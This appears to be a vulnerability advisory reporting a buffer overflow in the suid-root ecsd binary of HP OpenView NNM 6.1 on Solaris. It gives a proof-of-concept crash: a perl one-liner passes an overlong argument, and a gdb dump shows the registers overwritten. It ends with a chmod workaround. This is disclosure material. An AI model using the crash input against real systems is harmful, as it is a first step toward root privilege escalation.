COMMAND

    OpenView NNM

SYSTEMS AFFECTED

    HP OpenView NNM v6.1

PROBLEM

    Jonas Eriksson found following.  HP OpenView NNM v6.1 has a buffer
    overflow in the  suid-root file ecsd  located in the  /opt/OV/bin/
    directory.

    ecsd is not used in NNM, but is shipped and installed suid-root as
    default.

        je@openview~> uname -a
        SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
        je@openview~> ls -la /opt/OV/bin/ecsd
        -r-sr-xr-x   1 root     bin    2953640 maj 18 11:20 /opt/OV/bin/ecsd
        je@openview~> pwd
        /
        je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
        Failed to restore engine
        configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
        je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
        Segmentation fault (core dumped)
        je@openview~> gdb /opt/OV/bin/ecsd --core=core
        [snip..]
        Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
        [snip..]
        #0  0x28eb8 in main ()
        (gdb) inf reg
        [snip..]
        l1             0x41414141       1094795585
        l2             0x41414141       1094795585
        l3             0x41414141       1094795585
        l4             0x41414141       1094795585
        l5             0x41414141       1094795585
        l6             0x41414141       1094795585
        l7             0x41414141       1094795585
        i0             0x41414141       1094795585
        i1             0x41414141       1094795585
        i2             0x41414141       1094795585
        i3             0x41414141       1094795585
        i4             0x41414141       1094795585
        i5             0x41414141       1094795585
        fp             0x41410028       1094778920
        [snip..]
        (gdb)

SOLUTION

    Hewlett-Packard has been contacted.  They are currently working on
    patches for this vulnerability.  Workaround:

        chmod -s /opt/OV/bin/ecsd

    This will remove the  setuid bit from /opt/OV/bin/ecsd,  therefore
    if  someone  does  exploit  this  vulnerability,  they  won't gain
    higher privileges.